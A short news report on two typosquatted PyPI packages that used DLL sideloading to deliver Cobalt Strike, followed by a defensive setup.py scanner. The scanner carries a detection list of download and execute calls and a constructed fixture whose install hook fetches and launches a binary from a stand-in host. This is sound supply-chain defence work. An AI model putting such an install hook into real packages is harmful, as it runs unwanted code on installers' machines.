Two malicious Python Package Index packages, NP6HelperHttptest and NP6HelperHttper, which had more than 700 cumulative downloads before they were removed, used DLL sideloading to bypass security software and execute malicious code, The Hacker News reports.
Both packages, which are typosquatted versions of tools issued by ChapsVision for its NP6 marketing automation solution, contained a script that downloads a Kingsoft executable susceptible to DLL sideloading, a report from ReversingLabs showed. The sideloaded DLL then retrieves Cobalt Strike Beacon shellcode, disguised as a GIF file, from an attacker-controlled domain. Researchers also noted the possibility of a wider campaign using malicious PyPI packages to deploy executables vulnerable to DLL sideloading. "Development organizations need to be aware of the threats related to supply chain security and open-source package repositories. Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools," said ReversingLabs researcher Karlo Zanki.
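As an added defensive illustration (this code is not from ReversingLabs or the article), the following static check parses a package's setup.py and flags install-time download/execute calls and setuptools install-hook subclasses, the usual mechanism behind a "script enabling the download" of an executable. The fixture, its package name and its URL are constructed assumptions, not the real packages' contents.

```python
import ast
# Call targets a setup.py has no business reaching at install time (matched by prefix).
SUSPICIOUS_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get",
                    "subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "exec"}
# setuptools command classes that run arbitrary code during `pip install` when subclassed.
INSTALL_HOOK_BASES = {"setuptools.command.install.install", "setuptools.command.develop.develop"}

def _import_aliases(tree):
    # Map each locally bound import name to its fully qualified origin.
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            prefix = f"{node.module}." if getattr(node, "module", None) else ""
            for a in node.names:
                aliases[a.asname or a.name] = prefix + a.name
    return aliases

def _qualname(node, aliases):
    """Resolve a Name/Attribute chain through the import map ('sp.Popen' -> 'subprocess.Popen')."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join([aliases.get(node.id, node.id)] + parts[::-1])

def triage_setup_py(source):
    """Return {'calls': [(line, target)], 'install_hooks': [class_name]} for one setup.py."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    calls, hooks = [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and (target := _qualname(node.func, aliases)):
            if any(target == s or target.startswith(s + ".") for s in SUSPICIOUS_CALLS):
                calls.append((node.lineno, target))
        elif isinstance(node, ast.ClassDef) and {_qualname(b, aliases) for b in node.bases} & INSTALL_HOOK_BASES:
            hooks.append(node.name)
    return {"calls": sorted(set(calls)), "install_hooks": hooks}
# Constructed fixture, not a real package: an install hook that fetches and launches a binary.
SAMPLE_SETUP_PY = """\
from setuptools import setup
from setuptools.command.install import install
from urllib.request import urlretrieve
import subprocess as sp
class PostInstall(install):
    def run(self):
        urlretrieve("https://example.invalid/tool.exe", "tool.exe")
        sp.Popen(["tool.exe"])
setup(name="np6-helper-typo", version="0.1", cmdclass={"install": PostInstall})
"""
```

Run `triage_setup_py` over the setup.py of each sdist before it reaches a build host; a non-empty result is a reason to hold the package for review, not proof of malice.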